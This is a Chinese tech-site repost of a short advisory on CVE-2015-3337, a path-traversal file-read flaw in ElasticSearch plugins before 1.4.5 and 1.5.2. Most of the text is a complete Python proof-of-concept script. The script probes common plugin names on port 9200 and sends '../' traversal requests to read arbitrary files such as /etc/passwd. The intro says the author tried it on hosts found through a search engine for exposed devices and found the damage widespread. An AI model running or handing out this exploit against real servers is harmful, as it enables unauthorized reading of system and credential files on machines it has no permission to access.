Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / ElasticSearch曝本地任意文件读取漏洞,影响1.4.5和1.5.2之前所有版本(附POC)

近期在exploit-db上曝出了ElasticSearch插件功能的目录遍历(Path Transversal)引起的本地任意文件读取漏洞,影响1.4.5和1.5.2之前所有版本。在zoomeye上随便找了几个试了下,发现漏洞的影响面积还挺大的。漏洞利用(POC)#!/usr/bin/python# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/## Source: https://github.com/pandujar/elasticpwn/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337 "if len(sys.argv) <> 3:        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]        sys.exit() port = 9200 # Default ES http porthost = sys.argv[1]fpath = sys.argv[2] def grab(plugin):        socket.setdefaulttimeout(3)        s = socket.socket()        s.connect((host,port))        s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0 "            "Host: %s " % (plugin, fpath, host))        file = s.recv(2048)        print " [*] Trying to retrieve %s:" % fpath        if ("HTTP/1.0 200 OK" in file):            print " %s" % file        else:            print "[-] File Not Found, No Access Rights or System Not Vulnerable" def pfind(plugin):    try:        socket.setdefaulttimeout(3)        s = socket.socket()        s.connect((host,port))        s.send("GET /_plugin/%s/ HTTP/1.0 "            "Host: %s " % (plugin, host))        file = s.recv(16)        print "[*] Trying to find plugin %s:" % plugin        if ("HTTP/1.0 200 OK" in file):            print "[+] Plugin found!"            grab(plugin)            sys.exit()        else:            print "[-]  Not Found "    except Exception, e:        print "[-] Error connecting to %s: %s" % (host, e)        sys.exit() # Include more plugin names to check if they are installedpluginList = ["test","kopf", "HQ", "marvel", "bigdesk", "head"] for plugin in pluginList:    pfind(plugin)*消息来源:exploit-db,作者:jack,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)Elasticsearch安装使用教程 http://www.linuxidc.com/Linux/2015-02/113615.htm ElasticSearch 配置文件译文解析 http://www.linuxidc.com/Linux/2015-02/114244.htm ElasticSearch集群搭建实例  http://www.linuxidc.com/Linux/2015-02/114243.htm 分布式搜索ElasticSearch单机与服务器环境搭建  http://www.linuxidc.com/Linux/2012-05/60787.htm ElasticSearch的工作机制  http://www.linuxidc.com/Linux/2014-11/109922.htm ElasticSearch 的详细介绍:请点这里
ElasticSearch 的下载地址:请点这里 本文永久更新链接地址
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图